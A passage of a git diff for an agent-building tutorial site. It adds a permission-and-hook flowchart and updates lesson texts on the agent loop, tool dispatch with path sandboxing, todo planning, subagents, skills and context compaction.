}, + ], + }, + s17: { + nodes: [ + { id: "start", label: "User Input", type: "start", x: COL_CENTER, y: 30 }, + { id: "llm", label: "LLM Call", type: "process", x: COL_CENTER, y: 100 }, + { id: "tool_check", label: "tool_use?", type: "decision", x: COL_CENTER, y: 180 }, + { id: "pre_hook", label: "[1] PreToolUse\nHook", type: "process", x: 60, y: 270 }, + { id: "classify", label: "[2] Classify\n+ [3] Permission", type: "decision", x: 60, y: 370 }, + { id: "exec", label: "[4] Execute\n(handler / MCP)", type: "subprocess", x: COL_LEFT + 100, y: 270 }, + { id: "post_hook", label: "[5] PostToolUse\nHook", type: "process", x: COL_RIGHT - 40, y: 370 }, + { id: "append", label: "Append Result", type: "process", x: COL_CENTER, y: 490 }, + { id: "end", label: "Output", type: "end", x: COL_RIGHT, y: 180 }, + ], + edges: [ + { from: "start", to: "llm" }, + { from: "llm", to: "tool_check" }, + { from: "tool_check", to: "pre_hook", label: "yes" }, + { from: "tool_check", to: "end", label: "no" }, + { from: "pre_hook", to: "classify", label: "pass" }, + { from: "pre_hook", to: "append", label: "block" }, + { from: "classify", to: "exec", label: "allow" }, + { from: "classify", to: "append", label: "deny" }, + { from: "exec", to: "post_hook" }, + { from: "post_hook", to: "append" }, { from: "append", to: "llm" }, ], }, diff --git a/web/src/data/generated/docs.json b/web/src/data/generated/docs.json index b0a3f8975..2974afce1 100644 --- a/web/src/data/generated/docs.json +++ b/web/src/data/generated/docs.json @@ -3,216 +3,270 @@ "version": "s01", "locale": "en", "title": "s01: The Agent Loop", - "content": "# s01: The Agent Loop\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- one tool + one loop = an agent.\n\n## Problem\n\nA language model can reason about code, but it can't *touch* the real world -- can't read files, run tests, or check errors. Without a loop, every tool call requires you to manually copy-paste results back. You become the loop.\n\n## Solution\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\nOne exit condition controls the entire flow. The loop runs until the model stops calling tools.\n\n## How It Works\n\n1. User prompt becomes the first message.\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. Send messages + tool definitions to the LLM.\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. Append the assistant response. Check `stop_reason` -- if the model didn't call a tool, we're done.\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. Execute each tool call, collect results, append as a user message. Loop back to step 2.\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\nAssembled into one function:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\nThat's the entire agent in under 30 lines. Everything else in this course layers on top -- without changing the loop.\n\n## What Changed\n\n| Component | Before | After |\n|---------------|------------|--------------------------------|\n| Agent loop | (none) | `while True` + stop_reason |\n| Tools | (none) | `bash` (one tool) |\n| Messages | (none) | Accumulating list |\n| Control flow | (none) | `stop_reason != \"tool_use\"` |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" + "content": "# s01: The Agent Loop\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- one tool + one loop = an agent.\n>\n> **Harness layer**: The loop -- the model's first connection to the real world.\n\n## Problem\n\nA language model can reason about code, but it can't *touch* the real world -- can't read files, run tests, or check errors. Without a loop, every tool call requires you to manually copy-paste results back. You become the loop.\n\n## Solution\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\nOne exit condition controls the entire flow. The loop runs until the model stops calling tools.\n\n## How It Works\n\n1. User prompt becomes the first message.\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. Send messages + tool definitions to the LLM.\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. Append the assistant response. Check `stop_reason` -- if the model didn't call a tool, we're done.\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. Execute each tool call, collect results, append as a user message. Loop back to step 2.\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\nAssembled into one function:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\nThat's the entire agent in under 30 lines. Everything else in this course layers on top -- without changing the loop.\n\n## What Changed\n\n| Component | Before | After |\n|---------------|------------|--------------------------------|\n| Agent loop | (none) | `while True` + stop_reason |\n| Tools | (none) | `bash` (one tool) |\n| Messages | (none) | Accumulating list |\n| Control flow | (none) | `stop_reason != \"tool_use\"` |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" }, { "version": "s02", "locale": "en", "title": "s02: Tool Use", - "content": "# s02: Tool Use\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Adding a tool means adding one handler\"* -- the loop stays the same; new tools register into the dispatch map.\n\n## Problem\n\nWith only `bash`, the agent shells out for everything. `cat` truncates unpredictably, `sed` fails on special characters, and every bash call is an unconstrained security surface. Dedicated tools like `read_file` and `write_file` let you enforce path sandboxing at the tool level.\n\nThe key insight: adding tools does not require changing the loop.\n\n## Solution\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## How It Works\n\n1. Each tool gets a handler function. Path sandboxing prevents workspace escape.\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. The dispatch map links tool names to handlers.\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. In the loop, look up the handler by name. The loop body itself is unchanged from s01.\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\nAdd a tool = add a handler + add a schema entry. The loop never changes.\n\n## What Changed From s01\n\n| Component | Before (s01) | After (s02) |\n|----------------|--------------------|----------------------------|\n| Tools | 1 (bash only) | 4 (bash, read, write, edit)|\n| Dispatch | Hardcoded bash call | `TOOL_HANDLERS` dict |\n| Path safety | None | `safe_path()` sandbox |\n| Agent loop | Unchanged | Unchanged |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" + "content": "# s02: Tool Use\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Adding a tool means adding one handler\"* -- the loop stays the same; new tools register into the dispatch map.\n>\n> **Harness layer**: Tool dispatch -- expanding what the model can reach.\n\n## Problem\n\nWith only `bash`, the agent shells out for everything. `cat` truncates unpredictably, `sed` fails on special characters, and every bash call is an unconstrained security surface. Dedicated tools like `read_file` and `write_file` let you enforce path sandboxing at the tool level.\n\nThe key insight: adding tools does not require changing the loop.\n\n## Solution\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## How It Works\n\n1. Each tool gets a handler function. Path sandboxing prevents workspace escape.\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. The dispatch map links tool names to handlers.\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. In the loop, look up the handler by name. The loop body itself is unchanged from s01.\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\nAdd a tool = add a handler + add a schema entry. The loop never changes.\n\n## What Changed From s01\n\n| Component | Before (s01) | After (s02) |\n|----------------|--------------------|----------------------------|\n| Tools | 1 (bash only) | 4 (bash, read, write, edit)|\n| Dispatch | Hardcoded bash call | `TOOL_HANDLERS` dict |\n| Path safety | None | `safe_path()` sandbox |\n| Agent loop | Unchanged | Unchanged |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" }, { "version": "s03", "locale": "en", "title": "s03: TodoWrite", - "content": "# s03: TodoWrite\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"An agent without a plan drifts\"* -- list the steps first, then execute.\n\n## Problem\n\nOn multi-step tasks, the model loses track. It repeats work, skips steps, or wanders off. Long conversations make this worse -- the system prompt fades as tool results fill the context. A 10-step refactoring might complete steps 1-3, then the model starts improvising because it forgot steps 4-10.\n\n## Solution\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## How It Works\n\n1. TodoManager stores items with statuses. Only one item can be `in_progress` at a time.\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. The `todo` tool goes into the dispatch map like any other tool.\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. A nag reminder injects a nudge if the model goes 3+ rounds without calling `todo`.\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\nThe \"one in_progress at a time\" constraint forces sequential focus. The nag reminder creates accountability.\n\n## What Changed From s02\n\n| Component | Before (s02) | After (s03) |\n|----------------|------------------|----------------------------|\n| Tools | 4 | 5 (+todo) |\n| Planning | None | TodoManager with statuses |\n| Nag injection | None | `` after 3 rounds|\n| Agent loop | Simple dispatch | + rounds_since_todo counter|\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" + "content": "# s03: TodoWrite\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"An agent without a plan drifts\"* -- list the steps first, then execute.\n>\n> **Harness layer**: Planning -- keeping the model on course without scripting the route.\n\n## Problem\n\nOn multi-step tasks, the model loses track. It repeats work, skips steps, or wanders off. Long conversations make this worse -- the system prompt fades as tool results fill the context. A 10-step refactoring might complete steps 1-3, then the model starts improvising because it forgot steps 4-10.\n\n## Solution\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## How It Works\n\n1. TodoManager stores items with statuses. Only one item can be `in_progress` at a time.\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. The `todo` tool goes into the dispatch map like any other tool.\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. A nag reminder injects a nudge if the model goes 3+ rounds without calling `todo`.\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\nThe \"one in_progress at a time\" constraint forces sequential focus. The nag reminder creates accountability.\n\n## What Changed From s02\n\n| Component | Before (s02) | After (s03) |\n|----------------|------------------|----------------------------|\n| Tools | 4 | 5 (+todo) |\n| Planning | None | TodoManager with statuses |\n| Nag injection | None | `` after 3 rounds|\n| Agent loop | Simple dispatch | + rounds_since_todo counter|\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" }, { "version": "s04", "locale": "en", "title": "s04: Subagents", - "content": "# s04: Subagents\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Break big tasks down; each subtask gets a clean context\"* -- subagents use independent messages[], keeping the main conversation clean.\n\n## Problem\n\nAs the agent works, its messages array grows. Every file read, every bash output stays in context permanently. \"What testing framework does this project use?\" might require reading 5 files, but the parent only needs the answer: \"pytest.\"\n\n## Solution\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## How It Works\n\n1. The parent gets a `task` tool. The child gets all base tools except `task` (no recursive spawning).\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. The subagent starts with `messages=[]` and runs its own loop. Only the final text returns to the parent.\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\nThe child's entire message history (possibly 30+ tool calls) is discarded. The parent receives a one-paragraph summary as a normal `tool_result`.\n\n## What Changed From s03\n\n| Component | Before (s03) | After (s04) |\n|----------------|------------------|---------------------------|\n| Tools | 5 | 5 (base) + task (parent) |\n| Context | Single shared | Parent + child isolation |\n| Subagent | None | `run_subagent()` function |\n| Return value | N/A | Summary text only |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" + "content": "# s04: Subagents\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Break big tasks down; each subtask gets a clean context\"* -- subagents use independent messages[], keeping the main conversation clean.\n>\n> **Harness layer**: Context isolation -- protecting the model's clarity of thought.\n\n## Problem\n\nAs the agent works, its messages array grows. Every file read, every bash output stays in context permanently. \"What testing framework does this project use?\" might require reading 5 files, but the parent only needs the answer: \"pytest.\"\n\n## Solution\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## How It Works\n\n1. The parent gets a `task` tool. The child gets all base tools except `task` (no recursive spawning).\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. The subagent starts with `messages=[]` and runs its own loop. Only the final text returns to the parent.\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\nThe child's entire message history (possibly 30+ tool calls) is discarded. The parent receives a one-paragraph summary as a normal `tool_result`.\n\n## What Changed From s03\n\n| Component | Before (s03) | After (s04) |\n|----------------|------------------|---------------------------|\n| Tools | 5 | 5 (base) + task (parent) |\n| Context | Single shared | Parent + child isolation |\n| Subagent | None | `run_subagent()` function |\n| Return value | N/A | Summary text only |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" }, { "version": "s05", "locale": "en", "title": "s05: Skills", - "content": "# s05: Skills\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Load knowledge when you need it, not upfront\"* -- inject via tool_result, not the system prompt.\n\n## Problem\n\nYou want the agent to follow domain-specific workflows: git conventions, testing patterns, code review checklists. Putting everything in the system prompt wastes tokens on unused skills. 10 skills at 2000 tokens each = 20,000 tokens, most of which are irrelevant to any given task.\n\n## Solution\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\nLayer 1: skill *names* in system prompt (cheap). Layer 2: full *body* via tool_result (on demand).\n\n## How It Works\n\n1. Each skill is a directory containing a `SKILL.md` with YAML frontmatter.\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoader scans for `SKILL.md` files, uses the directory name as the skill identifier.\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return f\"\\n{skill['body']}\\n\"\n```\n\n3. Layer 1 goes into the system prompt. Layer 2 is just another tool handler.\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\nThe model learns what skills exist (cheap) and loads them when relevant (expensive).\n\n## What Changed From s04\n\n| Component | Before (s04) | After (s05) |\n|----------------|------------------|----------------------------|\n| Tools | 5 (base + task) | 5 (base + load_skill) |\n| System prompt | Static string | + skill descriptions |\n| Knowledge | None | skills/\\*/SKILL.md files |\n| Injection | None | Two-layer (system + result)|\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" + "content": "# s05: Skills\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Load knowledge when you need it, not upfront\"* -- inject via tool_result, not the system prompt.\n>\n> **Harness layer**: On-demand knowledge -- domain expertise, loaded when the model asks.\n\n## Problem\n\nYou want the agent to follow domain-specific workflows: git conventions, testing patterns, code review checklists. Putting everything in the system prompt wastes tokens on unused skills. 10 skills at 2000 tokens each = 20,000 tokens, most of which are irrelevant to any given task.\n\n## Solution\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\nLayer 1: skill *names* in system prompt (cheap). Layer 2: full *body* via tool_result (on demand).\n\n## How It Works\n\n1. Each skill is a directory containing a `SKILL.md` with YAML frontmatter.\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoader scans for `SKILL.md` files, uses the directory name as the skill identifier.\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return f\"\\n{skill['body']}\\n\"\n```\n\n3. Layer 1 goes into the system prompt. Layer 2 is just another tool handler.\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\nThe model learns what skills exist (cheap) and loads them when relevant (expensive).\n\n## What Changed From s04\n\n| Component | Before (s04) | After (s05) |\n|----------------|------------------|----------------------------|\n| Tools | 5 (base + task) | 5 (base + load_skill) |\n| System prompt | Static string | + skill descriptions |\n| Knowledge | None | skills/\\*/SKILL.md files |\n| Injection | None | Two-layer (system + result)|\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" }, { "version": "s06", "locale": "en", "title": "s06: Context Compact", - "content": "# s06: Context Compact\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Context will fill up; you need a way to make room\"* -- three-layer compression strategy for infinite sessions.\n\n## Problem\n\nThe context window is finite. A single `read_file` on a 1000-line file costs ~4000 tokens. After reading 30 files and running 20 bash commands, you hit 100,000+ tokens. The agent cannot work on large codebases without compression.\n\n## Solution\n\nThree layers, increasing in aggressiveness:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no 